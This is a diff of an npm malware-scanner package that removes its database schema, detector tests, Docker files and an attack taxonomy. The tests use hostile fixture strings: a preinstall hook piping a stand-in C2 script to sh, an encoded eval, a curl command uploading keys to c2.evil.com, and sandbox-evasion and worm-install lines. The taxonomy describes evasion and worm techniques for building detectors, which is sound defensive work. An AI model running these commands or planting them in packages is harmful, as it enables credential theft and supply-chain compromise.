@lateos/npm-scan 0.7.5 → 0.8.0

package/backend/db/pg-schema.sql

@@ -1,155 +0,0 @@
--- PostgreSQL schema for hosted/team tier (premium)
--- Extends the SQLite schema with teams, users, RBAC, audit logs, webhooks
-
--- Extensions
-CREATE EXTENSION IF NOT EXISTS "uuid-ossp";
-CREATE EXTENSION IF NOT EXISTS "pgcrypto";
-
--- Teams / Organizations
-CREATE TABLE IF NOT EXISTS teams (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  name TEXT NOT NULL,
-  slug TEXT UNIQUE NOT NULL,
-  license_edition TEXT NOT NULL DEFAULT 'community',
-  license_key TEXT,
-  license_expires_at TIMESTAMPTZ,
-  max_seats INTEGER NOT NULL DEFAULT 5,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
-  updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
--- Users
-CREATE TABLE IF NOT EXISTS users (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  email TEXT UNIQUE NOT NULL,
-  name TEXT NOT NULL,
-  password_hash TEXT NOT NULL,
-  team_id UUID REFERENCES teams(id) ON DELETE CASCADE,
-  role TEXT NOT NULL CHECK (role IN ('admin', 'editor', 'viewer')) DEFAULT 'viewer',
-  last_login_at TIMESTAMPTZ,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
--- Scans (extends SQLite scans with team ownership)
-CREATE TABLE IF NOT EXISTS scans (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  team_id UUID REFERENCES teams(id) ON DELETE CASCADE,
-  user_id UUID REFERENCES users(id) ON DELETE SET NULL,
-  package_name TEXT NOT NULL,
-  version TEXT,
-  status TEXT NOT NULL DEFAULT 'pending'
-    CHECK (status IN ('pending', 'fetching', 'analyzing', 'completed', 'failed')),
-  sbom_json JSONB,
-  findings_summary JSONB,
-  duration_ms INTEGER,
-  scanned_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
--- Findings
-CREATE TABLE IF NOT EXISTS findings (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  scan_id UUID NOT NULL REFERENCES scans(id) ON DELETE CASCADE,
-  atk_id TEXT NOT NULL,
-  severity TEXT NOT NULL CHECK (severity IN ('info', 'low', 'medium', 'high', 'critical')),
-  title TEXT,
-  description TEXT,
-  evidence TEXT,
-  mitigation TEXT,
-  file_path TEXT,
-  line_number INTEGER
-);
-
--- Indexes
-CREATE INDEX IF NOT EXISTS idx_scans_team ON scans(team_id);
-CREATE INDEX IF NOT EXISTS idx_scans_package ON scans(package_name);
-CREATE INDEX IF NOT EXISTS idx_scans_status ON scans(status);
-CREATE INDEX IF NOT EXISTS idx_scans_created ON scans(scanned_at DESC);
-CREATE INDEX IF NOT EXISTS idx_findings_scan ON findings(scan_id);
-CREATE INDEX IF NOT EXISTS idx_findings_atk ON findings(atk_id);
-CREATE INDEX IF NOT EXISTS idx_findings_severity ON findings(severity);
-CREATE INDEX IF NOT EXISTS idx_users_team ON users(team_id);
-
--- Audit log
-CREATE TABLE IF NOT EXISTS audit_log (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  team_id UUID NOT NULL REFERENCES teams(id) ON DELETE CASCADE,
-  user_id UUID REFERENCES users(id) ON DELETE SET NULL,
-  action TEXT NOT NULL,
-  resource_type TEXT NOT NULL,
-  resource_id TEXT,
-  details JSONB,
-  ip_address INET,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
-CREATE INDEX IF NOT EXISTS idx_audit_team ON audit_log(team_id, created_at DESC);
-
--- Webhooks
-CREATE TABLE IF NOT EXISTS webhooks (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  team_id UUID NOT NULL REFERENCES teams(id) ON DELETE CASCADE,
-  url TEXT NOT NULL,
-  secret TEXT NOT NULL DEFAULT encode(gen_random_bytes(32), 'hex'),
-  events TEXT[] NOT NULL DEFAULT '{}',
-  active BOOLEAN NOT NULL DEFAULT true,
-  last_triggered_at TIMESTAMPTZ,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
-CREATE INDEX IF NOT EXISTS idx_webhooks_team ON webhooks(team_id);
-
--- API keys
-CREATE TABLE IF NOT EXISTS api_keys (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  team_id UUID NOT NULL REFERENCES teams(id) ON DELETE CASCADE,
-  user_id UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE,
-  name TEXT NOT NULL,
-  key_hash TEXT NOT NULL,
-  scopes TEXT[] NOT NULL DEFAULT '{}',
-  last_used_at TIMESTAMPTZ,
-  expires_at TIMESTAMPTZ,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
-CREATE INDEX IF NOT EXISTS idx_api_keys_team ON api_keys(team_id);
-
--- Session tokens
-CREATE TABLE IF NOT EXISTS sessions (
-  id UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
-  user_id UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE,
-  token_hash TEXT NOT NULL,
-  expires_at TIMESTAMPTZ NOT NULL,
-  created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
-);
-
-CREATE INDEX IF NOT EXISTS idx_sessions_user ON sessions(user_id);
-CREATE INDEX IF NOT EXISTS idx_sessions_expires ON sessions(expires_at);
-
--- Materialized view: package risk aggregation
-CREATE MATERIALIZED VIEW IF NOT EXISTS package_risk AS
-SELECT
-  s.package_name,
-  s.version,
-  COUNT(DISTINCT f.id) AS finding_count,
-  COUNT(DISTINCT f.id) FILTER (WHERE f.severity IN ('high', 'critical')) AS high_crit_count,
-  ARRAY_AGG(DISTINCT f.atk_id) AS atk_ids,
-  MAX(s.scanned_at) AS last_scanned
-FROM scans s
-JOIN findings f ON f.scan_id = s.id
-WHERE s.status = 'completed'
-GROUP BY s.package_name, s.version;
-
-CREATE UNIQUE INDEX IF NOT EXISTS idx_package_risk_pkg ON package_risk(package_name, version);
-
--- Function: touch updated_at
-CREATE OR REPLACE FUNCTION touch_updated_at()
-RETURNS TRIGGER AS $$
-BEGIN
-  NEW.updated_at = NOW();
-  RETURN NEW;
-END;
-$$ LANGUAGE plpgsql;
-
-CREATE TRIGGER trg_teams_updated_at
-  BEFORE UPDATE ON teams
-  FOR EACH ROW EXECUTE FUNCTION touch_updated_at();

package/backend/detectors.test.js

@@ -1,88 +0,0 @@
-import { test } from 'node:test';
-import assert from 'assert/strict';
-import * as detectors from './detectors/index.js';
-
-test('detectors runAll empty', async () => {
-  const findings = await detectors.runAll({});
-  assert.equal(findings.length, 0);
-});
-
-test('ATK-001 detects preinstall', async () => {
-  const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
-  const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-001'), 'Expected ATK-001');
-});
-
-test('ATK-002 detects eval+decode', async () => {
-  const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-002'), 'Expected ATK-002');
-});
-
-test('ATK-003 detects cred env vars', async () => {
-  const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-003'), 'Expected ATK-003');
-});
-
-test('ATK-004 detects editor persistence', async () => {
-  const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-004'), 'Expected ATK-004');
-});
-
-test('ATK-005 detects network exfil', async () => {
-  const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-005'), 'Expected ATK-005');
-});
-
-test('ATK-006 detects dep confusion', async () => {
-  const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
-  const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-006'), 'Expected ATK-006');
-});
-
-test('ATK-007 detects typosquatting', async () => {
-  const pkg = { dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } };
-  const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-007'), 'Expected ATK-007 for loddsh');
-});
-
-test('ATK-008 detects tarball tampering', async () => {
-  const pkg = { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } };
-  const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-008'), 'Expected ATK-008');
-});
-
-test('ATK-009 detects CI env trigger', async () => {
-  const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-009'), 'Expected ATK-009');
-});
-
-test('ATK-010 detects sandbox evasion', async () => {
-  const files = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-010'), 'Expected ATK-010');
-});
-
-test('ATK-011 detects transitive propagation', async () => {
-  const files = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
-  const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-011'), 'Expected ATK-011');
-});
-
-test('no false positives on clean package', async () => {
-  const pkg = { name: 'test-pkg', version: '1.0.0', scripts: { test: 'node test.js' }, dependencies: { 'express': '4.0.0' } };
-  const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
-  const findings = await detectors.runAll(pkg, files);
-  const highCrit = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
-  assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
-});
-
-test('all 11 ATK IDs present', async () => {
-  const expected = ['ATK-001', 'ATK-002', 'ATK-003', 'ATK-004', 'ATK-005', 'ATK-006', 'ATK-007', 'ATK-008', 'ATK-009', 'ATK-010', 'ATK-011'];
-  const exports = Object.keys(detectors);
-  assert.equal(exports.includes('runAll'), true);
-});

package/docker/Dockerfile.cli

@@ -1 +0,0 @@
-FROM node:20-alpine AS cli\n\nWORKDIR /app\nCOPY package.json .\nRUN npm ci --only=production\nCOPY . .\n\nENTRYPOINT [\"node\", \"cli/cli.js\"]\n\n# Multi-arch build: docker buildx build --platform linux/amd64,linux/arm64 -t ghcr.io/lateos/npm-scan:cli .

package/docker/docker-compose.yml

@@ -1 +0,0 @@
-version: '3.8'\nservices:\n  cli:\n    build:\n      context: ..\n      dockerfile: docker/Dockerfile.cli\n    image: ghcr.io/lateos/npm-scan:cli\n\n  # Full pipeline stubs (Phase 1+)\n  enumerator:\n    image: ghcr.io/lateos/npm-scan:enumerator\n  fetcher:\n    image: ghcr.io/lateos/npm-scan:fetcher\n    depends_on: [redis]\n  analyzer-static:\n    image: ghcr.io/lateos/npm-scan:analyzer\n  # ...\n\n  redis:\n    image: redis:alpine\n\n# Usage: docker compose up cli

package/docs/attack-taxonomy.md

@@ -1,53 +0,0 @@
-# npm Attack Taxonomy (ATK)
-
-Versioned anchor for detectors, PRs, reports. Each entry: attack class, detection surface, evasion surface, NIST 800-161 mapping.
-
-## ATK Table
-
-| ID      | Class                                      | Detection Surface | Evasion Surface          | NIST 800-161     | Status |
-|---------|--------------------------------------------|-------------------|--------------------------|------------------|--------|
-| ATK-001 | Malicious lifecycle scripts (pre/postinstall) | Static          | Obfuscation              | SR-3.1           | Phase 1 |
-| ATK-002 | Obfuscated payload (hex/base64/eval)       | Static          | Polyglots               | SR-4.2           | Phase 1 |
-| ATK-003 | Credential harvesting (.npmrc/SSH/env)      | Static+Dynamic  | Conditional triggers     | SR-5.3           | Phase 1 |
-| ATK-004 | Persistence (.vscode/.claude/.cursor)      | Static          | Hidden files             | SR-6.4           | Phase 1 |
-| ATK-005 | Network exfiltration (GitHub/DNS/HTTP C2)  | Static+Dynamic  | Encrypted payloads       | SR-7.5           | Phase 1 |
-| ATK-006 | Dependency confusion/namespace squatting   | Static (lock)   | Typosquatting            | SR-2.2           | Phase 1 |
-| ATK-007 | Typosquatting (edit-distance top-N)        | Static          | Homoglyphs               | SR-2.1           | Phase 1 |
-| ATK-008 | Tarball tampering (tarball ≠ repo)         | Static (diff)   | Mirror repos             | SR-8.1           | Phase 2 |
-| ATK-009 | Conditional triggers (CI/time)             | Static+Dynamic  | Env probes               | SR-9.2           | Phase 2 |
-| ATK-010 | Sandbox evasion                            | Static+Dynamic  | Anti-analysis            | SR-10.3          | Phase 2 |
-| ATK-011 | Transitive propagation (worm)              | Static+Dynamic  | Peer deps                | SR-11.4          | Phase 3 |
-
-## Detailed Entries
-
-### ATK-008 — Tarball Tampering
-- **Description:** The published npm tarball contains code that does not match the source repository. This can happen when a maintainer's npm token is compromised or CI is abused.
-- **Detection surface:** Static (diff). Compare `package.json` `repository` field against known good mappings. Check embedded `// Source:` comments against declared repo URL. Full automated diff against `git clone` requires sandbox tier.
-- **Evasion surface:** Mirror repos, monorepo confusion, repository field omitted or generic (`github.com/user`).
-- **NIST mapping:** SR-8.1 (Integrity Verification)
-- **Example:** A package named `lodash` with `repository` pointing to `github.com/attacker/lodash-mirror`.
-
-### ATK-009 — Conditional Triggers
-- **Description:** The package behaves differently based on environment detection. May appear benign during scan but activates malicious behavior in production. Common triggers: CI env detection, date/time checks, hostname checks.
-- **Detection surface:** Static+Dynamic. Static analysis looks for `process.env.CI`, `process.env.NODE_ENV`, date comparisons, `setTimeout`/`setInterval`. Dynamic sandbox runs with randomized env and observes behavior difference.
-- **Evasion surface:** Obfuscated env probes, time-based triggers with external NTP, trigger after multi-hour delay.
-- **NIST mapping:** SR-9.2 (Conditional Behavior Analysis)
-- **Example:** `if (process.env.NODE_ENV === 'production') { eval(atob(payload)) }`
-
-### ATK-010 — Sandbox Evasion / Anti-Analysis
-- **Description:** The package actively probes its execution environment to detect analysis tools. If sandbox is detected, the package suppresses malicious behavior. Common probes: `debugger` statement, `os.hostname()`, `process.argv` inspection for `--inspect`, stack trace capture.
-- **Detection surface:** Static+Dynamic. Static analysis checks for debugger statements, hostname checks, process tree inspection, `navigator`/`document` usage (browser env confusion). Dynamic sandbox uses randomized env and monitors syscalls for sandbox-detection patterns.
-- **Evasion surface:** Indirect probing (measure timing without `performance.now()`), environment fingerprinting through error messages, incremental evasion.
-- **NIST mapping:** SR-10.3 (Anti-Evasion Detection)
-- **Example:** `if (os.hostname().includes('docker')) { process.exit(0) }`
-
-### ATK-011 — Transitive Propagation (Worm)
-- **Description:** The package acts as a self-propagating worm by spreading itself through the dependency tree. Instead of (or in addition to) executing a standalone payload, it modifies peer/sibling packages' code or `package.json` to inject its own lifecycle hooks or entry points. This propagates the attack when the infected sibling is required by other packages upstream. Also covers "worm-drop" patterns where the package installs itself into other packages' `node_modules` via programmatic `npm install`/`npm link`.
-- **Detection surface:** Static+Dynamic. Static analysis checks for `child_process.exec`/`execSync` with `npm install`/`npm link` of local packages, `fs.writeFile` targeting sibling `node_modules` directories, `package.json` script injection in other packages, `fs.symlink` for binary propagation, and self-name references used to locate and copy own code into peer packages. Dynamic sandbox monitors filesystem writes outside the package's own directory tree.
-- **Evasion surface:** Peer dep confusion (installing a popular peer package with the same name as a benign transitive dep), delayed propagation (worm activates only after N runs or N days), piggybacking on legitimate `postinstall` chains, writing to `node_modules/.cache` or `node_modules/.bin` where detection is less likely.
-- **NIST mapping:** SR-11.4 (Supply Chain Propagation Monitoring)
-- **Example:** A package reads `process.env.npm_package_name`, locates its own directory in `node_modules`, then writes a malicious `postinstall` script to the `package.json` of a sibling package, ensuring the worm runs when any project dependency is installed.
-
-## Governance
-
-New ATK requires PR with: PoC sample, detection rule, FP analysis, NIST map. Published at `docs/attack-taxonomy.md`. Referenced in all scan reports.